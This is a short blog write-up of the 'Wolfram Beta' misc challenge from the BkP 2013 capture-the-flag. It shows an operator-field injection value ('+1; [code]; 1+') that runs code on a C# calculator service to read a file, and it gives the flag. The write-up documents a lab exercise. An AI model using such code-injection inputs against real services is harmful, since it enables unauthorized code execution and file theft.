Monday, June 10, 2013

Wolfram Beta - Misc 100 BkP 2013

This challenge had us connect to a server running a "Wolfram Beta" calculator.

The calculator asked the user for a number, then an operator, and another number.  It would then calculate the solution:

Wolfram Beta - BkP CTF 2013 Team
Wolfram Beta is a great calculator.
just put in a number at the prompt
then put in the operator
then finally the second number
and the calculation will be done INSTANTLY
no accounts necessacary, unlike some of our competition!
first num: 1
operator: +
second num: 1
Done Thinking!

We immediately assumed that the operator field was the vulnerable.  After several attempts, we found a way to inject code:

operator: +1; [code]; 1+

Since the server would kindly display program errors to us,  we knew it was a C# program.  After learning some C# code, we figured out how to read an entire file and print it out to the console.

key is:  at_least_its_not_a_python_jail

No comments:

Post a Comment